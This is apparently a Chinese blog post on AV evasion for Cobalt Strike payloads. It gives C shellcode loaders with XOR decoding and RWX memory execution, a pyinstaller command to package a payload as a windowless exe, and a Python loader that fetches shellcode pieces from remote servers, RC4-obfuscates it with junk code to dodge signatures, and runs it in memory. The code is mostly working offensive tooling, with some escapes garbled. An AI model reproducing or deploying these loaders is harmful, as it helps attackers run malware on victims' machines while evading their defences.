浅谈利用cs进行免杀的思路总结

2025年6月10日18:04:30评论11 views字数 4273阅读14分14秒阅读模式

思路①
利用c语言+veil实现免杀

#include "pch.h"//可以删除#include <windows.h>#include <stdio.h>#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")//不显示窗口unsigned char shellcode[] = "xfcxe8x89x00x00x00x60x89xe5......";//即生成的veilvoid main(){  LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  if (Memory == NULL) { return; }  memcpy(Memory, shellcode, sizeof(shellcode));  ((void(*)())Memory)();}

#include<windows.h>#include<iostream>int main(int argc, char **argv) {  char b[] = { "xfcx48x83xe4xf0xe8xc8...." };  char c[sizeof b];  for (int i = 0; i < sizeof b; i++) { c[i] = b[i] ^ 'x'; }  void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  memcpy(exec, c, sizeof c);  ((void(*)())exec)();}

思路②
利用python生成的payload+直接进行免杀
先在cs中生成python的payload
任然后利用工具pyinstaller进行免杀
代码如下

pyinstaller -F -w -i 1.exe payload.py-i 代表选取的图标的名字 也可以为1.ico-f 表示生成一个单的文件-w表示在windows环境下不打开窗口运行 payload.py即表示文件生成的

思路③
利用python+veil+pyinstaller进行免杀
源码如下（python的）

from ctypes import *import ctypesimport sys, os, hashlib, time, base64import random, stringimport requestsimport time# 获取随机字符串函数，减少特征def GenPassword(length):    numOfNum = random.randint(1,length-1)    numOfLetter = length - numOfNum    slcNum = [random.choice(string.digits) for i in range(numOfNum)]    slcLetter = [random.choice(string.ascii_letters) for i in range(numOfLetter)]    slcChar = slcNum + slcLetter    random.shuffle(slcChar)    getPwd = ''.join([i for i in slcChar])    return getPwd# rc4加解密函数，public_key（公钥）使用GenPassword函数，减少特征def rc4(string, op='encode', public_key=GenPassword(7), expirytime=0):    ckey_lenth = 4    public_key = public_key and public_key or ''    key = hashlib.md5(public_key).hexdigest()    keya = hashlib.md5(key[0:16]).hexdigest()    keyb = hashlib.md5(key[16:32]).hexdigest()    keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or ''    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()    key_lenth = len(cryptkey)  # 64    string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string    string_lenth = len(string)    result = ''    box = list(range(256))    randkey = []    for i in xrange(255):        randkey.append(ord(cryptkey[i % key_lenth]))    for i in xrange(255):        j = 0        j = (j + box[i] + randkey[i]) % 256        tmp = box[i]        box[i] = box[j]        box[j] = tmp    for i in xrange(string_lenth):        a = j = 0        a = (a + 1) % 256        j = (j + box[a]) % 256        tmp = box[a]        box[a] = box[j]        box[j] = tmp        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))    if op == 'decode':        if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5(                result[26:] + keyb).hexdigest()[0:16]:            return result[26:]        else:            return None    else:        return keyc + base64.b64encode(result)# 以下为shellcode loader代码# shellcode字符串经过base64编码再经过hex编码分成三块，存放在某几个服务器上# get请求方式得到经过编码的shellcode字符串res1 = requests.get("http://xxx.xxx.xxx/code/Shellcode1.TXT")res2 = requests.get("http://xxx.xxx.xxx/code/Shellcode2.TXT")res3 = requests.get("http://xxx.xxx.xxx/code/Shellcode3.TXT")VirtualAlloc = ctypes.windll.kernel32.VirtualAllocVirtualProtect = ctypes.windll.kernel32.VirtualProtectwhnd = ctypes.windll.kernel32.GetConsoleWindow()rcpw = GenPassword(13)# 得到经过编码后的shellcode字符串后进行rc4加密，私钥通过GenPassword()函数得到# 以此减少**，达到内存中不暴露shellcode原始字符串buf = rc4(base64.b64decode(res1.text+res2.text+res3.text).decode('hex'),'encode',rcpw)rc4(res2.text,'encode',GenPassword(13))# 干扰代码if whnd != 0:    if GenPassword(6) != GenPassword(7):#干扰代码        ctypes.windll.use***.ShowWindow(whnd, 0)        ctypes.windll.kernel32.CloseHandle(whnd)# 解密shellcodescode = bytearray(rc4(buf, 'decode', rcpw))rc4(res2.text+res1.text,'encode',GenPassword(13))# 干扰代码# 申请可读可写不可执行的内存memHscode = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),                                                      ctypes.c_int(len(scode)),                                                      ctypes.c_int(0x3000),                                                      ctypes.c_int(0x40))rc4(res1.text,'encode',GenPassword(13))# 干扰代码buf = (ctypes.c_char * len(scode)).from_buffer(scode)old = ctypes.c_long(1)# 使用VirtualProtect将shellcode的内存区块设置为可执行，所谓的渐进式加载模式VirtualProtect(memHscode, ctypes.c_int(len(scode)), 0x40, ctypes.byref(old))ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memHscode),                                     buf,                                     ctypes.c_int(len(scode)))fuck=rc4(GenPassword(7),'encode',GenPassword(13))# 干扰代码runcode = cast(memHscode, CFUNCTYPE(c_void_p))# 创建 shellcode 的函数指针fuck=rc4(GenPassword(7),'encode',GenPassword(13))# 干扰代码runcode()# 执行